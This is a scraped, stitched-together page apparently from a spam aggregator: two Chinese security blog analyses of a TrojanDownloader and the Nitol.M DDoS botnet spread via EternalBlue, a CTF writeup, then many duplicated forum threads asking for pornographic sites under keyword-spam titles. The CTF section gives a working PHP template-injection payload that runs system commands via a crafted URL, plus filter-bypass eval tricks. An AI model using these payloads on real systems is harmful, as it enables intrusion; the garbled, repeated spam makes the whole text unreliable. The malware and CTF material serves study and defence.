阅读量 82031 | 评论 2 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-10-11 16:30:02

零 前言
TrojanDownloader(中文名:文件下载者病毒)主要通过游戏外挂等方式传播。是一款比较早期的病毒样本,已知最早的入库时间是在2008年,其本身危害性不高,但是由于他的作用,其危害性体现在其所下载的恶意代码上。

一 目录
1.目录
2.样本信息
3.行为分析
4.样本分析
5.技术上的总结

二 样本分析
1.样本名称:sample.WSDump.exe
2.样本md5:25a1eb3d3f8767a86050d16c226f9912
3.是否加壳:UPX
4.编写语言:VC++6.0
5.样本来源:网络获取

三 行为分析
病毒首先创建互斥体121212,和判断自身文件是否存在,如果存在就启用网络套接字以便执行下一步操作。如果不存在则退出程序。

在执行体函数中,程序首先初始化一些服务控制器的状态信息,然后创建”Net CLR”的互斥体,接着枚举二进制资源,加载hra33.dll这个dll文件,接下来分别创建三个线程,执行不同的操作。

四 样本分析
ExecuteFun
这个函数是程序的主要执行部分。

设置serviceStatus状态

更新资源
加载hra33.dll这个动态链接库文件
创建三个线程

UpdateSource
这个函数主要是用于更新资源的,但是由于注册表Services.Net CLR不存在导致函数提前退出。

根据Service注册表下Net CLR文件,创建新文件

然后利用跟新资源的方式让其像一个可执行文件

Thread_1
利用od跟入Thread_1函数。

获取本地主机的名称和地址

获取本地网关

这里有个病毒作者的错误,本来他想的是如果主机用户是管理员则执行这个判断,但是他直接引用的是字符串,造成判断无效,所有用户都成立

利用上面得到的本地网关地址,和用户名及密码作为参数传入CreateFileAndExecuteFun(emmmm不像是真的)。

CreateFileAndExecuteFun
程序先与远程主机利用ipc$漏洞创建一个共享的命名管道,用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。还可以访问共享资源,并使用一些字典工具,进行密码探测,以至于获得更高的权限。然后黑客从服务端可以利用nc等软件向主机发送一个shell。

创建映射方式,以便后期的文件操作,通过WNetAddConnection2A API将共享目录映射为本地磁盘,之后即可按本地文件形式访问文件,最后断开连接。[参考:http://blog.sina.com.cn/s/blog_672355630102vnwa.html]

把本地文件复制到共享文件的C-E盘

Thread_2
获取本地时间和20130221进行比较,如果大于则创建Thread3这个线程执行

Thread_3
判断链接192.168.1.107是否正常

利用switch 通过接收不同的指令,来决定执行的操作,如下图

16号:

18号:

20号:

6号:

2号:

3号:

4号:

IsConnectFun()
解Base编码得到IP地址:192.168.1.107:83

GetInformationFun
识别出当前系统版本信息

读取注册表,查看CPU的频率

调用 GlobalMemoryStatusEx获取内存信息,

查看网络适配器情况

五 技术上的总结
调试程序比较难的地方在于跟入CreateThread创建的线程中,因为OD是单线程调试器,所以不会直接跟入创建的线程(子线程)中,我们采用Sleep函数来跟入线程函数中。

找到线程所指向的函数,在函数开头下断
修改调用CreateThread函数下一条语句,写入如下部分
push 100000 ;将Slepp的参数压入
Call Kernel32.Sleep
f8执行,函数自动断在线程函数刚刚下断的地方。
参考自:https://blog.csdn.net/whatday/article/details/9059281

关于ipc$的使用,参考自https://blog.csdn.net/smithjackhack/article/details/78559970

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/161100
安全客 – 有思想的安全新媒体
逆向工程 病毒分析

HaCky 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
大表姐
换一个
|评论列表
吃瓜群众 · 2018-10-12 08:45:42 1 回复
建议先搞清楚病毒主类型,家族名的概念

HaCky · 本文作者 · 2018-10-18 09:30:07 回复
请问这样命名有什么问题么

HaCky
这个人太懒了,签名都懒得写一个
文章
6
粉丝
3
TA的文章
Criakl勒索病毒分析简要
2019-02-20 10:30:01
某后门病毒分析报告
2019-02-15 16:30:40
NotPetya勒索病毒分析报告
2018-11-14 15:30:29
TrojanDownloader病毒分析报告
2018-10-11 16:30:02
骷髅病毒分析报告
2018-09-19 15:30:15
输入关键字搜索内容
相关文章
Criakl勒索病毒分析简要
无符号Golang程序逆向方法解析
INS hack teaser 2019 逆向题解
一加手机 Root 后门分析
如何绕过EDR的内存保护机制
mips64逆向新手入门(从jarvisoj一道mips64题目说起)
逆向Tempur-Pedic床垫底座遥控器(Part 1)
热门推荐
文章目录
零 前言
一 目录
二 样本分析
三 行为分析
四 样本分析
ExecuteFun
UpdateSource
Thread_1
CreateFileAndExecuteFun
Thread_2
Thread_3
IsConnectFun()
GetInformationFun
五 技术上的总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

nitol

nitol
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】EternalBlue与Trojan[DDoS]/Win32.Nitol.M的“狼狈为奸”
阅读量 49206 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-08-25 16:20:04
https://p1.ssl.qhimg.com/t0187185b478dd0ae50.jpg

前言

2017年4月被匿名黑客“影子经纪人”公布了第二批NSA武器,其中就包含了”EternalBlue”——MS17-010漏洞,5月中旬该漏洞的自动化利用工具如雨后春笋般在地下黑产出现并迅速传播,目前为止安天捕风监控捕获到的”EternalBlue”自动化利用工具已经已有多套(见图1-1 工具集合),这也证实国外某黑客“NSA工具公布意味着黑客平民化开始”的警告言论。

http://p6.qhimg.com/t01d4aa87beccf5386f.png

图1-1 工具集合

“EternalBlue”自动化工具的出现伊始就已经实现漏洞与各类型病毒结合。从早期监控捕获到的”EternalBlue”与Gh0st远控的为虎作伥实现RAT(Remote Accass Trojan)自动化种植感染,到现在的”EternalBlue”与Nitol.M的狼狈为奸实现DDoS botnet快速自动化拓展“肉鸡”,都警示着:互联网安全形势越发严峻,为互联网安全保驾护航更是任重而道远。

基本信息

http://p0.qhimg.com/t016a46cf14f3e3af90.png

表1-1 样本基本信息

传播方式

2017-08-14 08:41:54,安天-捕风监控到一则木马感染事件(见图3-1 监控捕获数据),并自动获取相关hfs(HTTP Files Server)目录下的样本数据。发现hfs里面还存放有”EternalBlue”自动化利用工具(见图3-2 hfs数据),经过IDA分析x86.dll样本得知利用该工具感染的病毒正是Trojan[DDoS]/Win32.Nitol.M被控端木马(见图3-3 木马下载url地址),即http://***.***.166.83:5999/hw1.exe的Trojan[DDoS]/Win32.Nitol.M样本可以通过该工具利用MS17-010漏洞进行自动化“肉鸡”拓展。

http://p7.qhimg.com/t01841c87ef0d8c0372.png

图3-1 监控捕获数据

http://p8.qhimg.com/t011d1162bfed484967.png

图3-2 hfs数据

http://p4.qhimg.com/t01f3ea64288c13f4ab.png

图3-3 木马下载url地址

样本详细分析

因为DDoS botnet的Nitol家族源码早已开源化,所以互联网上出现很多根据源码改进的变种版本,Trojan[DDoS]/Win32.Nitol.M就是其中之一,主要实现DDoS攻击类型有syn flood、udp flood、icmp flood、tcp flood、dns flood、cc flood。

1)样本备份与创建服务

样本运行会通过检查服务名称”.Net CLR”(该服务名称是Nitol家族默认服务名称)存在与否来验证样本是否初次运行。见图4-1 检查服务名称:

http://p8.qhimg.com/t01091a986ff9372544.png

图4-1 检查服务名称

2)如果服务名不存在,则进行样本备份和创建服务实现样本自启动而长期驻留受害系统。

见图4-2 样本备份及自启动设置:

http://p4.qhimg.com/t01942ebe4daa280495.png

图4-2 样本备份及自启动设置

3)配置解密获取C2并创建连接。

在配置解密上Trojan[DDoS]/Win32.Nitol.M同样继承Nitol家族系列的风格,使用base64 + 凯撒位移 + 异或三重算法进行加密。

见图4-3 C2配置解密:

http://p0.qhimg.com/t01d6505cdc80b24c16.png

图4-3 C2配置解密

4)获取系统配置信息。

获取系统版本和CPU配置及内存信息作为向C2发送的首包内容,并实时等待接收C2远程指令,见图4-4 bot与C2通讯交互:

http://p6.qhimg.com/t01df86facf89d295fe.png

图4-4 bot与C2通讯交互

5)解析并执行C2的远程指令。

当接收到C2的远程指令是首先对指令类型进行识别鉴定,然后分类执行(见图4-5 识别鉴定指令类型)。

http://p7.qhimg.com/t01bb6834887d02a705.png

图4-5 识别鉴定指令类型

远程指令类型主要包含有DDoS Attack、Stop Attack、Download Files、CMD Shell、Delete Service,见表4-1指令类型数据表:

http://p3.qhimg.com/t013cac85af8f2f6a4e.png

表4-1 指令类型数据表

6)DDoS攻击指令协议解析。

该变种的DDoS Attack攻击有syn flood、udp flood、icmp flood、tcp flood、dns flood、cc flood 6种攻击类型,见图4-6 DDoS攻击类型。攻击类型协议整理见表4-2 攻击类型协议表:

http://p6.qhimg.com/t01f3ff06cb38a49e49.png

图4-6 DDoS攻击类型

http://p6.qhimg.com/t0133a06ffdc7f103f1.png

表4-2攻击类型协议表

攻击情报

结合7月21日捕获到的同家族版本进行监控获取的攻击情报中得知,近一个月中共发起579次攻击,185起攻击事件,主要使用攻击类型为syn flood占57.3%,cc flood(http flood)占28.6%,icmp flood占11.9%,tcp flood占2.2%,表4-3 受害者Top30列出被攻击次数top30的部分攻击情报,攻击情报概览见图4-7 Trojan[DDoS]/Win32.Nitol.M攻击情报概览。

表4-3 受害者Top30

http://p0.qhimg.com/t01d65a6ac2ba50d2a6.png

http://p5.qhimg.com/t012089d5ed572fe8fc.png

http://p6.qhimg.com/t014f031ea196e7a51e.png

https://p3.ssl.qhimg.com/t01a034d68b6fdc5333.png

图4-7 Trojan[DDoS]/Win32.Nitol.M攻击情报概览

总结

因为独木难支,所以任何一个botnet家族都不会对互联网形成足够大的威胁,但是如果结合漏洞的自动化利用工具迅速拓展botnet的“肉鸡”量,再加上多个botnet组团攻击将会对互联网造成极大的危害。从安天-捕风监控到的历次高流量攻击事件都是多个botnet家族联合发起攻击。据了解,目前网上流传的“EternalBlue”自动化漏洞利用工具,通过IP网段自动化批量扫描每天仍旧能入侵大量设备并植入病毒,也就侧面说明还有很多设备尚未升级系统及修补漏洞补丁。因此,安天作为国内网络安全尽责的守护者之一,提醒广大同行警惕新型botnet的兴起,同时也提醒广大互联网用户安全、健康上网,安装杀毒、防毒软件(参考1 安天智甲工具)并及时升级系统和修补设备漏洞!

参考资料

http://www.antiy.com/tools.html

MD5:c7d0827b6224b86f0a90fa42a8d39edd

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/86701
安全客 – 有思想的安全新媒体
安全知识

botnet-放牛娃 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
神奇小子
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
botnet-放牛娃
这个人太懒了,签名都懒得写一个
文章
2
粉丝
0
TA的文章
【技术分享】EternalBlue与Trojan[DDoS]/Win32.Nitol.M的“狼狈为奸”
2017-08-25 16:20:04
【木马分析】一款国产Linux DDoS僵尸网络家族Jenki分析
2017-08-04 14:22:45
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

一叶飘零

一叶飘零
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
2018安恒杯 – 9月月赛Writeup
阅读量 196359 | 评论 6 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-09-24 10:00:59

前言
中秋放假,做了一下安恒月赛,记录一下题解

Web1
首先弱密码爆进后台

admin
admin123
看到突兀的字体

一看就是出题人留下的了

探寻了一遍功能

发现添加图片处也有这种字体

很容易联想到漏洞点,于是开始代码审计

下载

http://101.71.29.5:10013/web/You_Cant_Guess.zip
定位到图片位置

public function actionShow(){
$template = ‘

图片内容为:

图片ID:{cms:id}
图片名称:{cms:name}
图片地址:{cms:pic}’;
if (isset($_GET[‘id’])) {
$model = new Content();
$res = $model->find()->where([‘id’ =>intval($_GET[‘id’])])->one();
$template = str_replace(“{cms:id}”,$res->id,$template);
$template = str_replace(“{cms:name}”,$res->name,$template);
$template = str_replace(“{cms:pic}”,$res->url,$template);
$template = $this->parseIf($template);
echo $template;
}else{
return json_encode([‘error’=>’id error!’]);
}
}
跟进函数parseIf

参考文章

https://www.anquanke.com/post/id/153402
我们添加图片为

skysec
{if:1)$GLOBALS[‘_G’.’ET’][sky]($GLOBALS[‘_G’.’ET’][cool]);die();//}{end if}
然后访问

http://101.71.29.5:10013/web/index.php?r=content%2Fshow&id=1919&sky=system&cool=ls
即可列目录

拿flag即可

flag{65bb1dd503d2a682b47fde40571598f4}

Web2
拿到题目

http://101.71.29.5:10014/
代码如下

35){
die(“Long.”);
}
if(preg_match(“/[A-Za-z0-9_$]+/”,$code)){
die(“NO.”);
}
@eval($code);
}else{
highlight_file(__FILE__);
}
//$hint = “php function getFlag() to get flag”;
?>
发现字母啥都被过滤了,第一反应就是通配符,容易想到

/???/??? => /bin/cat
那么构造

$_=`/???/???%20/???/???/????/?????.???`;?>
“/bin/cat /var/www/html/index.php”
长度超过了上限

参考这篇文章

https://www.anquanke.com/post/id/154284
使用*通配

$_=`/???/???%20/???/???/????/*`;?>
但是没有$和_
改进为

?>
得到

发现关键点

function getFlag(){
$flag = file_get_contents(‘/flag’);
echo $flag;
}
我们直接读flag文件就好

?>

得到flag

flag{aa5237a5fc25af3fa07f1d724f7548d7}

Misc1
下载用winrar打开

很明显的长度为6的CRC32

我们用工具爆破一下

得到压缩包密码

forum_91ctf_com_66
解密后得到

我们n2s转成字符串,得到

扫描得到flag

flag{owid0-o91hf-9iahg}

Misc2
拿到题目是张图片,binwalk跑了一下发现了压缩包

提取出来需要密码解压,尝试了各种方法,最后竟然是修改图片高度,太脑洞了吧???

将原来的044C改为04FF,即可

解压后得到一个压缩包,本能的导出html对象

浏览一遍,发现可疑字符串,解base64,得到flag

flag{Oz_4nd_Hir0_lov3_For3ver}

Crypto1
这题略带脑洞,解压出的密文为

ilnllliiikkninlekile
长度为20

并且发现提示

The length of this plaintext: 10
密文长度是明文的2倍,然后密文只有5个字母出现,本能想到多表加密,但是不知道表的边缘的排序方式
例如:

ilnke
iklne
…..
因为排序规则不同,就涉及对应的字母不同,所以这里我选择爆破一发

import itertools

key = []
cipher = “ilnllliiikkninlekile”

for i in itertools.permutations(‘ilnke’, 5):
key.append(”.join(i))

for now_key in key:
solve_c = “”
res = “”
for now_c in cipher:
solve_c += str(now_key.index(now_c))
for i in range(0,len(solve_c),2):
now_ascii = int(solve_c[i])*5+int(solve_c[i+1])+97
if now_ascii>ord(‘i’):
now_ascii+=1
res += chr(now_ascii)
if “flag” in res:
print now_key,res
得到结果

linke flagishere
linek flagkxhdwd
一看就是第一个,结果交了不对。。。
后来发现要交md5,得到flag

flag{eedda7bea3964bfb288ca6004a973c2a}

Crypto2
拿到题目

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from Crypto.Cipher import AES
from Crypto import Random

def encrypt(data, password):
bs = AES.block_size
pad = lambda s: s + (bs – len(s) % bs) * chr(bs – len(s) % bs)
iv = “0102030405060708”
cipher = AES.new(password, AES.MODE_CBC, iv)
data = cipher.encrypt(pad(data))
return data

def decrypt(data, password):
unpad = lambda s : s[0:-ord(s[-1])]
iv = “0102030405060708”
cipher = AES.new(password, AES.MODE_CBC, iv)
data = cipher.decrypt(data)
return unpad(data)

def generate_passwd(key):
data_halt = “LvR7GrlG0A4WIMBrUwTFoA==”.decode(“base64”)
rand_int = int(decrypt(data_halt, key).encode(“hex”), 16)
round = 0x7DC59612
result = 1
a1 = 0
while a1 < round: a2 = 0 while a2 < round: a3 = 0 while a3 < round: result = result * (rand_int % 0xB18E) % 0xB18E a3 += 1 a2 += 1 a1 += 1 return encrypt(str(result), key) if __name__ == '__main__': key = raw_input("key:") if len(key) != 32: print "check key length!" exit() passwd = generate_passwd(key.decode("hex")) flag = raw_input("flag:") print "output:", encrypt(flag, passwd).encode("base64") # key = md5(sha1("flag")) # output = "u6WHK2bnAsvTP/lPagu7c/K3la0mrveKrXryBPF/LKFE2HYgRNLGzr1J1yObUapw" 我们不难看出这题的难点应该在于generate_passwd()了吧,加解密函数都给你写好了,调用就行,我们仔细观察这个generate_passwd() def generate_passwd(key): data_halt = "LvR7GrlG0A4WIMBrUwTFoA==".decode("base64") rand_int = int(decrypt(data_halt, key).encode("hex"), 16) round = 0x7DC59612 result = 1 a1 = 0 while a1 < round: a2 = 0 while a2 < round: a3 = 0 while a3 < round: result = result * (rand_int % 0xB18E) % 0xB18E a3 += 1 a2 += 1 a1 += 1 return encrypt(str(result), key) 看起来很复杂,还有3层循环,但仔细抓住result,发现其值一定小于0xB18E 那么爆破即可 output = "u6WHK2bnAsvTP/lPagu7c/K3la0mrveKrXryBPF/LKFE2HYgRNLGzr1J1yObUapw" key = md5(sha1("flag")) for result in range(0xB18E): passwd = generate_passwd(key.decode("hex"),result) r = decrypt(output.decode("base64"), passwd) if 'flag' in r: print r 拿到flag flag{552d3a0e567542d99694c4d61d1a652e} 本文由安全客原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/160582 安全客 - 有思想的安全新媒体 CTF writeup 一叶飘零 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 ETW注册表监控windows内核实现原理 2019-02-21 14:30:47 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 Lucky双平台勒索者解密分析 2019-02-21 10:45:27 off by null漏洞getshell示例 2019-02-20 16:59:40 |发表评论 发表你的评论吧 昵称 小虎 换一个 |评论列表 一叶飘零 · 本文作者 · 2018-10-06 10:44:23 回复 web1:ph牛的深入分析 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 膜 一叶飘零 · 本文作者 · 2018-10-06 10:44:51 回复 写错了,web2 神奇小子 · 2018-09-26 16:10:13 回复 感觉题目质量 比网鼎杯高啊 妇科圣手 · 2018-09-25 12:59:24 回复 逆向的呢? 一叶飘零 · 本文作者 · 2018-09-26 14:48:21 1 回复 逆向,一个是base64+rc4,一个是矩阵相乘+rot13,应该是今晚,安恒有直播,7点-8点,你可以看一下 Ronpa · 2018-09-26 11:52:22 1 回复 逆向的我投稿了 不知道过没过233333 一叶飘零 个人博客:skysec.top 文章 49 粉丝 99 TA的文章 2019安恒1月月赛Writeip-Web&Crypto&Misc 2019-01-27 11:00:54 JavaScript侧信道时间测量 2019-01-27 10:30:24 2018安恒杯11月赛-Web&Crypto题解 2018-11-26 10:02:02 当中国剩余定理邂逅RSA 2018-11-21 15:50:18 session_start()&bestphp 2018-11-19 09:39:33 输入关键字搜索内容 相关文章 off by null漏洞getshell示例 HackIMshop的解析及学习 FireShellCTF2019 babyheap 详细题解 tcache Attack:lctf2018 easy_heap Nullcon2019-pwn详解 HackIM 2019 Web记录 fireShellCTF 2019 RE&PWN 热门推荐 文章目录 前言 Web1 Web2 Misc1 Misc2 Crypto1 Crypto2 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

qq空间盗歌器

qq空间盗歌器悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

给个成人网站

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

可以看的成人网站

可以看的成人网站悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

谁有成人网站

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

不用下载的黄页

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

不用下载的黄

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

给个黄网站

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

求个色网站

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

能看的成人网

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

